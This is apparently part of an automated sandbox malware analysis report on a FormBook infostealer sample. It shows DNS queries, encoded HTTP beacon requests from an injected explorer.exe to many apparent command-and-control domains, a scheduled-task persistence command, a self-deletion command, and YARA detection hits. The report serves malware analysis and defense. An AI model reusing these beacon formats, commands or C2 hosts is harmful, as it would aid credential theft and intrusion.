                                                                          Sep 21, 2021 02:20:23.258923054 CEST | 8.8.8.8 | 192.168.2.3 | 0x538b | No error (0) | www.kutahyaescortbayanlarim.xyz | | 104.21.2.184 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:23.258923054 CEST | 8.8.8.8 | 192.168.2.3 | 0x538b | No error (0) | www.kutahyaescortbayanlarim.xyz | | 172.67.129.140 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:29.059885979 CEST | 8.8.8.8 | 192.168.2.3 | 0x30d8 | No error (0) | www.emilfaucets.com | | 23.92.26.10 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:39.494118929 CEST | 8.8.8.8 | 192.168.2.3 | 0x4de9 | No error (0) | www.sunshinefamilysupport.com | sunshinefamilysupport.com | | CNAME (Canonical name) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:39.494118929 CEST | 8.8.8.8 | 192.168.2.3 | 0x4de9 | No error (0) | sunshinefamilysupport.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:44.894406080 CEST | 8.8.8.8 | 192.168.2.3 | 0x5696 | No error (0) | www.invetorsbank.com | | 185.53.177.12 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:50.393183947 CEST | 8.8.8.8 | 192.168.2.3 | 0x6816 | No error (0) | www.loccssol.store | connect.shopbase.com | | CNAME (Canonical name) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:50.393183947 CEST | 8.8.8.8 | 192.168.2.3 | 0x6816 | No error (0) | connect.shopbase.com | | 185.33.94.22 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:50.393183947 CEST | 8.8.8.8 | 192.168.2.3 | 0x6816 | No error (0) | connect.shopbase.com | | 185.33.94.234 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:55.531225920 CEST | 8.8.8.8 | 192.168.2.3 | 0xc70a | No error (0) | www.brightlifeprochoice.com | | 172.67.169.11 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:20:55.531225920 CEST | 8.8.8.8 | 192.168.2.3 | 0xc70a | No error (0) | www.brightlifeprochoice.com | | 104.21.27.72 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:00.864193916 CEST | 8.8.8.8 | 192.168.2.3 | 0x9951 | Name error (3) | www.thesewhitevvalls.com | none | none | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:05.993624926 CEST | 8.8.8.8 | 192.168.2.3 | 0x8e49 | No error (0) | www.starsspell.com | starsspell.com | | CNAME (Canonical name) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:05.993624926 CEST | 8.8.8.8 | 192.168.2.3 | 0x8e49 | No error (0) | starsspell.com | | 70.40.216.229 | A (IP address) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:11.701076031 CEST | 8.8.8.8 | 192.168.2.3 | 0x9195 | No error (0) | www.newstodayupdate.com | newstodayupdate.com | | CNAME (Canonical name) | IN (0x0001)
                                                                          Sep 21, 2021 02:21:11.701076031 CEST | 8.8.8.8 | 192.168.2.3 | 0x9195 | No error (0) | newstodayupdate.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                                                          HTTP Request Dependency Graph


                                                                          HTTP Packets

                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          0 | 192.168.2.3 | 49767 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:20:18.048001051 CEST | 6882 | OUT | GET /b2c0/?_JE=HN6lmWAsN4eOR9yN7lRwrlIaFZSjtluPDfuHRsVFTQ6SUbSrxCD+Omdw++swUDkTm/7Z&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.carts-amazon.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:18.215401888 CEST | 6882 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Tue, 21 Sep 2021 00:20:18 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6139efaa-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          1 | 192.168.2.3 | 49768 | 104.21.2.184 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:20:23.281737089 CEST | 6883 | OUT | GET /b2c0/?_JE=KWX9NFx1Gr7EjrLRbP2Ue6172ayjYXgbpVpgMDrQRkbxhVzMYie83xsGqGgpFAioWvz0&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.kutahyaescortbayanlarim.xyz
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:23.731086969 CEST | 6884 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 21 Sep 2021 00:20:23 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.3.24
                                                                          set-cookie: PHPSESSID=226b47b2a8a5769a54cb3424142a9526; path=/
                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                          cache-control: no-store, no-cache, must-revalidate
                                                                          pragma: no-cache
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=b8HFJx1aVV9arzA3%2BirsgDjQ1PN%2F8CXAqg3X4oJI9wx04LOYS2k3jGoP5K5qKMmXI3N85RpgnSVC3RqnwfG3BqFTFtFKhrolceT5hZ1%2Fd4jN4XLAkdyNeeNCRqqdd7YsWXEl2rnDsA1FnKdRCFjf%2F5TD"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 691f209d9da14ec8-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          2 | 192.168.2.3 | 49769 | 23.92.26.10 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:20:29.238538980 CEST | 6885 | OUT | GET /b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.emilfaucets.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:29.414244890 CEST6885INHTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.14.2
                                                                          Date: Tue, 21 Sep 2021 00:20:29 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 185
                                                                          Connection: close
                                                                          Location: https://www.emilfaucets.com/b2c0/?_JE=Vx4H34AfvC8+5ufWQT1ywEaqK5CQ+nmgdM61680UbYEpJUiUIyjnXiODPkc5gWJA3z4C&-Z=9rjLOxDhNVLl4X
                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          3 | 192.168.2.3 | 49770 | 184.168.131.241 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:20:39.666773081 CEST | 6887 | OUT | GET /b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.sunshinefamilysupport.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:39.861923933 CEST | 6887 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Server: nginx/1.20.1
                                                                          Date: Tue, 21 Sep 2021 00:20:39 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Location: http://www.sunshinefamilysupport.com.au/b2c0/?_JE=OHhY/R7K/8h4MegcVZK1Xj4hyqShMd99eYdWuTQY8l2Zovp1jXuaaoSrFKSMy8PCBLbw&-Z=9rjLOxDhNVLl4X
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          4 | 192.168.2.3 | 49771 | 185.53.177.12 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:20:44.929759979 CEST | 6888 | OUT | GET /b2c0/?_JE=uqZnad07QiGCKwdGYcwo9Lbmnd7wjNT/WYKGRVhSVOqBK78kk4TDY1HvjRJsoD1gaAbq&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.invetorsbank.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:44.946695089 CEST | 6889 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: nginx
                                                                          Date: Tue, 21 Sep 2021 00:20:44 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 146
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          5 | 192.168.2.3 | 49784 | 185.33.94.22 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:20:50.413014889 CEST | 6927 | OUT | GET /b2c0/?_JE=T/FvhneI6kXhrarG8DZpDikOenyRImYajqrPlFumj7GB2BrAWwUdaa1CHdljUEylHeGw&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.loccssol.store
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:50.462430000 CEST | 6928 | IN | HTTP/1.1 403 Forbidden
                                                                          Date: Tue, 21 Sep 2021 00:20:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Chl-Bypass: 1
                                                                          Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Set-Cookie: __cf_bm=4OZpWhQLK46upX7OUaTQ1YthCz0.KCHf.7FzqFihlP0-1632183650-0-AZtSc5qNi89UiZKgE+UNKKWxtcE5S83zE/Uw7yrFzu0Epbv6HqDLZZ1SvYC8SXXO8+weQKYYghMThOUaOn8o5Sg=; path=/; expires=Tue, 21-Sep-21 00:50:50 GMT; domain=.www.loccssol.store; HttpOnly
                                                                          Server: cloudflare
                                                                          CF-RAY: 691f214729a14303-FRA


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          6 | 192.168.2.3 | 49801 | 172.67.169.11 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:20:55.550383091 CEST | 6981 | OUT | GET /b2c0/?_JE=iqPHNlAuEp+rWkrFhaEt134F/UvnRG9uU2uGhWM6L7rkNLvrOy7oDxfHgSZWSk7NT09j&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.brightlifeprochoice.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:20:55.697921038 CEST | 6982 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Tue, 21 Sep 2021 00:20:55 GMT
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dallbwbbB0jG3QI%2FttpOEybBvqprjoPuNOtTsjrQcsjxHUo1%2BvUmm9DaZAAKmupQffulU4Vs%2BQDOCjdHDaYj%2B2wmEVe7Y9qZkCGHCRK4NG7pd4nuryOOQJSCr8TL9nmuiugD9crgI62gedrQXBY%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 691f21673fcf699f-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                          Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                          Sep 21, 2021 02:20:55.697942972 CEST | 6982 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          7 | 192.168.2.3 | 49802 | 70.40.216.229 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:21:06.154762030 CEST | 6983 | OUT | GET /b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.starsspell.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:21:07.205437899 CEST | 6984 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Tue, 21 Sep 2021 00:21:06 GMT
                                                                          Server: Apache
                                                                          X-Redirect-By: WordPress
                                                                          Content-Security-Policy: upgrade-insecure-requests
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Location: https://starsspell.com/b2c0/?_JE=fiodKOJcDC+U41n6yUoUA/NOfrt4VaPFcyjK7goYzH96zQ9HGoFcrenwBQCzJ6xg1U1l&-Z=9rjLOxDhNVLl4X
                                                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          Content-Length: 0
                                                                          Content-Type: text/html; charset=UTF-8


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          8 | 192.168.2.3 | 49803 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Sep 21, 2021 02:21:11.726536036 CEST | 6985 | OUT | GET /b2c0/?_JE=ngE3zTEQZhYKSyvQI1JtRqVv6LVi69c0agGQYGihkwEIgq8iGc/2kBp4e4/I6lFanwA/&-Z=9rjLOxDhNVLl4X HTTP/1.1
                                                                          Host: www.newstodayupdate.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Sep 21, 2021 02:21:11.917900085 CEST | 6985 | IN | HTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Tue, 21 Sep 2021 00:21:11 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6138e204-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage


                                                                          Memory Usage


                                                                          High Level Behavior Distribution


                                                                          Behavior


                                                                          System Behavior

                                                                          General

                                                                          Start time:02:19:04
                                                                          Start date:21/09/2021
                                                                          Path:C:\Users\user\Desktop\Updated SOA.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\Updated SOA.exe'
                                                                          Imagebase:0x770000
                                                                          File size:833024 bytes
                                                                          MD5 hash:08098C5EF23FB87AF19A5ADBDD31324B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.239287823.0000000002B91000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240050165.0000000003CCC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.239734200.0000000003B99000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:02:19:16
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\oydxFbGhGlh' /XML 'C:\Users\user\AppData\Local\Temp\tmp14E0.tmp'
                                                                          Imagebase:0x860000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:02:19:16
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:02:19:16
                                                                          Start date:21/09/2021
                                                                          Path:C:\Users\user\Desktop\Updated SOA.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\Updated SOA.exe
                                                                          Imagebase:0x4e0000
                                                                          File size:833024 bytes
                                                                          MD5 hash:08098C5EF23FB87AF19A5ADBDD31324B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.300181528.0000000000F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.300204060.0000000000F50000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.299772162.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          General

                                                                          Start time:02:19:18
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0x7ff714890000
                                                                          File size:3933184 bytes
                                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.287563072.000000000E2BA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.266285027.000000000E2BA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          General

                                                                          Start time:02:19:42
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\SysWOW64\cmmon32.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                                          Imagebase:0xdf0000
                                                                          File size:36864 bytes
                                                                          MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.483644410.0000000000C00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.483325816.0000000000BD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          General

                                                                          Start time:02:19:46
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del 'C:\Users\user\Desktop\Updated SOA.exe'
                                                                          Imagebase:0xbd0000
                                                                          File size:232960 bytes
                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:02:19:47
                                                                          Start date:21/09/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Disassembly

                                                                          Code Analysis

                                                                            Executed Functions

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 3e5q
                                                                            • API String ID: 0-150274692
                                                                            • Opcode ID: fdfe93991e29a15099a1245cff5467001f24957e3780663226f0021ea2e12aab
                                                                            • Instruction ID: 971652f11604dc685349e2139519d6162cba189d27ad18bb8aefe099b27ce6cc
                                                                            • Opcode Fuzzy Hash: fdfe93991e29a15099a1245cff5467001f24957e3780663226f0021ea2e12aab
                                                                            • Instruction Fuzzy Hash: 3CB2D375E00628CFDB64CF69C984AD9BBB2FF89304F1581E9D509AB225DB319E91CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243650623.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: bdf7b17b70f8cd36bd748b3feaa70e41e08f5ae22e160bc004ef5f3c38f197c3
                                                                            • Instruction ID: 72f31e5c26d16fc0a28819de178ba62ff1fcf82e4d2dbe9eafc7df6a21bc8e57
                                                                            • Opcode Fuzzy Hash: bdf7b17b70f8cd36bd748b3feaa70e41e08f5ae22e160bc004ef5f3c38f197c3
                                                                            • Instruction Fuzzy Hash: 4B32BC30B012058FDB1ADB68C954BAEB7F6AF88305F24406DE545DB3A1DB75ED02CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: be25dd18557482cbef5c2c14f67a5f3690f95bf8108a9f29e4d6e80ec70b16ad
                                                                            • Instruction ID: 4ef064c6dd62cf9053fb1737b83a2f2a0ff6ad45dee03c43a92caf0f92c58ba2
                                                                            • Opcode Fuzzy Hash: be25dd18557482cbef5c2c14f67a5f3690f95bf8108a9f29e4d6e80ec70b16ad
                                                                            • Instruction Fuzzy Hash: 7CB138B1D042098FDB04DFA9C586AAEFBF2BF89344F25C029E454AB346E7349946CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
